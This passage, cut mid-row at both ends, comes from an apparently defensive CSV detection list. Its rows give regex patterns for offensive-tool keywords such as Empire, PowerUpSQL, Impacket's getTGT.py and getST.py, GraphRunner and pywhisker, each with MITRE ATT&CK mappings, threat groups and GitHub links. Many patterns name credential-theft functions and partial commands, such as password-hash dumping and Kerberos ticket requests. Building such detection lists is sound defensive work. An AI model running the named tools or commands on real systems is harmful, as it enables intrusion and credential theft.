T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SQLServerLoginDefaultPw.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46269" "*Get-SQLServerLoginDefaultPw*",".{0,1000}Get\-SQLServerLoginDefaultPw.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. 
and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46270" "*Get-SQLServerPasswordHash*",".{0,1000}Get\-SQLServerPasswordHash.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46271" "*Get-SQLServerPriv*",".{0,1000}Get\-SQLServerPriv.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46272" "*Get-SQLServiceAccount*",".{0,1000}Get\-SQLServiceAccount.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46273" "*Get-SQLServiceAccountPwHashes*",".{0,1000}Get\-SQLServiceAccountPwHashes.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46274" "*Get-SQLSysadminCheck*",".{0,1000}Get\-SQLSysadminCheck.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - 
Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SQLServerLoginDefaultPw.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46275" "*Get-SQLSysadminCheck*",".{0,1000}Get\-SQLSysadminCheck.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46276" "*Get-SQLTriggerDdl*",".{0,1000}Get\-SQLTriggerDdl.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46277" "*Get-SQLTriggerDml*",".{0,1000}Get\-SQLTriggerDml.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46278" "*getST.py * -spn *",".{0,1000}getST\.py\s.{0,1000}\s\-spn\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46279" "*getST.py -k -no-pass -spn*",".{0,1000}getST\.py\s\-k\s\-no\-pass\s\-spn.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven 
hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46280" "*getST.py -spn *",".{0,1000}getST\.py\s\-spn\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","46281" "*GetSyscallStub.nim*",".{0,1000}GetSyscallStub\.nim.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","46283" "*Get-System.ps1*",".{0,1000}Get\-System\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-System.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46284" "*Get-SystemDNSServer.ps1*",".{0,1000}Get\-SystemDNSServer\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SystemDNSServer.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46285" "*Get-SystemNamedPipe*",".{0,1000}Get\-SystemNamedPipe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-System.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46286" "*Get-TeamsChat *",".{0,1000}Get\-TeamsChat\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46287" "*Get-TeamsChat*Downloads full Teams chat 
conversations*",".{0,1000}Get\-TeamsChat.{0,1000}Downloads\sfull\sTeams\schat\sconversations.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46288" "*getTGT.py -dc-ip *",".{0,1000}getTGT\.py\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46289" "*getTGT.py -dc-ip*",".{0,1000}getTGT\.py\s\-dc\-ip.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","46290" "*getTGT.py*",".{0,1000}getTGT\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","46291" "*gettgtpkinit.py -cert-pfx *",".{0,1000}gettgtpkinit\.py\s\-cert\-pfx\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","46292" "*gettgtpkinit.py -cert-pfx*",".{0,1000}gettgtpkinit\.py\s\-cert\-pfx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46293" "*gettgtpkinit.py -pfx-base64 *",".{0,1000}gettgtpkinit\.py\s\-pfx\-base64\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46294" "*gettgtpkinit.py*",".{0,1000}gettgtpkinit\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","46295" "*Get-TimedScreenshot.ps1*",".{0,1000}Get\-TimedScreenshot\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46297" "*Getting permissions of sensitive files.*",".{0,1000}Getting\spermissions\sof\ssensitive\sfiles\..{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","46298" "*Getting the Obfuscated JS Code*",".{0,1000}Getting\sthe\sObfuscated\sJS\sCode.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","46299" "*Get-TrustTicket.ps1*",".{0,1000}Get\-TrustTicket\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","46300" "*Get-UnattendSensitiveData*",".{0,1000}Get\-UnattendSensitiveData.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - 
T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","46301" "*Get-UniqueTokens*",".{0,1000}Get\-UniqueTokens.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46302" "*get-unixUserPassword.py*",".{0,1000}get\-unixUserPassword\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","46303" "*Get-USBKeystrokes*",".{0,1000}Get\-USBKeystrokes.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1152","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46305" "*Get-UserBadPwdCount*",".{0,1000}Get\-UserBadPwdCount.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
